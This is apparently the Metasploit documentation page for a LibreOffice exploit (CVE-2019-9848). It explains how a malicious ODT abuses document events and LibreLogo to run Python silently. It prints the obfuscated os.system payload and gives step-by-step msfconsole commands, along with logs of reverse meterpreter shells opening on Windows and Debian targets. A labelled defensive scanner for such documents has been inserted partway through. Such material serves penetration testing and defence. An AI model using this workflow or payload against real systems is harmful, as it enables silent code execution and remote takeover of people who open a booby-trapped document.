metasploit-gs/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
2019-08-03 05:53:29 +02:00


Description

This module exploits CVE-2019-9848 and is based on the module exploiting CVE-2018-16858, written by Shelby Pace.

LibreOffice has a feature where documents can specify that pre-installed scripts are executed on various document events, such as mouse-over. LibreOffice is also typically bundled with LibreLogo, a programmable turtle vector graphics script, which can be manipulated into executing arbitrary Python commands.

By using the document event feature to trigger LibreLogo to execute Python contained within a document, a malicious document can be constructed that executes arbitrary Python commands silently, without warning.

This module generates an ODT file with a dom loaded event that, when triggered, executes arbitrary Python code and the Metasploit payload. LibreLogo executes the Python code stored in the text part of the document.

The generated document file contains a Python one-liner that calls os.system:

getattr(__import__("os"),"system")("<%= @cmd %>")

but encoded:

<text:p text:style-name="P8">&#x67;&#x65;&#x74;&#x61;&#x74;&#x74;&#x72;(&#x5f;&#x5f;&#x69;&#x6d;&#x70;&#x6f;&#x72;&#x74;&#x5f;&#x5f;(&#x201C;\x6f\&#x78;73&#x201D;),&#x201C;\&#x78;73\&#x78;79\&#x78;73\&#x78;74\x65\&#x78;6d&#x201D;)(“<%= @cmd %>”)</text:p>

To avoid any Python error, the h1 title written in the document is a Python comment (#).
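
A defender-side check for the mechanism described above, as an added example that is not part of the Metasploit module or its documentation: it lists the document event listeners in an ODT that are bound to a script URI and marks those that target LibreLogo. The `vnd.sun.star.script:` scheme, the ODF `script:event-listener` element and the `dom:load` event name are assumptions taken from ODF and LibreOffice scripting conventions rather than from this page; the sample archive and its placeholder URI are constructed.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

SCRIPT_NS = "urn:oasis:names:tc:opendocument:xmlns:script:1.0"
XLINK_NS = "http://www.w3.org/1999/xlink"
MAX_PART = 20 * 1024 * 1024  # refuse oversized XML parts (zip-bomb guard)

def scan_odt(data: bytes) -> list:
    """Return one finding per document event listener bound to a script URI."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as odt:
        for part in ("content.xml", "styles.xml"):
            if part not in odt.namelist():
                continue
            if odt.getinfo(part).file_size > MAX_PART:
                raise ValueError(part + " is too large to scan safely")
            xml = odt.read(part)
            if b"<!DOCTYPE" in xml:  # reject DTDs to avoid entity expansion
                raise ValueError(part + " declares a DTD")
            for el in ET.fromstring(xml).iter("{%s}event-listener" % SCRIPT_NS):
                href = el.get("{%s}href" % XLINK_NS, "")
                if not href.lower().startswith("vnd.sun.star.script:"):
                    continue  # ordinary link, not a script binding
                findings.append({
                    "part": part,
                    "event": el.get("{%s}event-name" % SCRIPT_NS),
                    "href": href,
                    # LibreLogo as the script target is the pattern described above
                    "librelogo": "librelogo" in href.lower(),
                })
    return findings

def build_sample(href: str) -> bytes:
    """Constructed, minimal ODT-like archive for the demo (not a full document)."""
    xml = (
        '<office:document-content'
        ' xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"'
        ' xmlns:script="%s" xmlns:xlink="%s"><office:event-listeners>'
        '<script:event-listener script:event-name="dom:load" xlink:href="%s"/>'
        '</office:event-listeners></office:document-content>'
    ) % (SCRIPT_NS, XLINK_NS, href)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as odt:
        odt.writestr("content.xml", xml)
    return buf.getvalue()

if __name__ == "__main__":
    # Constructed, non-functional script URI: only the LibreLogo name matters here.
    for hit in scan_odt(build_sample("vnd.sun.star.script:LibreLogo|PLACEHOLDER")):
        print(hit)
```

Any finding with `librelogo` set on a document received from outside is worth quarantining, since ordinary documents have no reason to bind a load event to LibreLogo.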

Vulnerable Application

LibreOffice version 6.2.5 and prior.

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/multi/fileformat/libreoffice_logo_exec
  4. Do: set LHOST <ip>
  5. Do: set LPORT <port>
  6. Do: run
  7. Move the generated file to the target
  8. Start a handler
  9. Open the file with a vulnerable version of LibreOffice
  10. You should get a shell.

Scenarios

Tested on LibreOffice 6.2.4 running Windows 7

msf5 > use exploit/multi/fileformat/libreoffice_logo_exec 
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set lhost 192.168.33.1
lhost => 192.168.33.1
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run

[+] librefile.odt stored at /home/foobar/.msf4/local/librefile.odt
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > use multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.33.1
lhost => 192.168.33.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.33.1:4444 
[*] Sending stage (179779 bytes) to 192.168.33.102
[*] Meterpreter session 3 opened (192.168.33.1:4444 -> 192.168.33.102:46327) at 2019-07-29 03:33:03 -0400

meterpreter > 

Tested on LibreOffice 6.2.4 running Debian 9.9

msf5 > use exploit/multi/fileformat/libreoffice_logo_exec 
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set lhost 192.168.33.1
lhost => 192.168.33.1
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run

[+] librefile.odt stored at /home/foobar/.msf4/local/librefile.odt
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > use multi/handler
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.33.1
lhost => 192.168.33.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.33.1:4444 
[*] Sending stage (985320 bytes) to 192.168.33.117
[*] Meterpreter session 5 opened (192.168.33.1:4444 -> 192.168.33.117:43602) at 2019-07-29 04:44:04 -0400

meterpreter > getuid
Server username: uid=1001, gid=1001, euid=1001, egid=1001
meterpreter >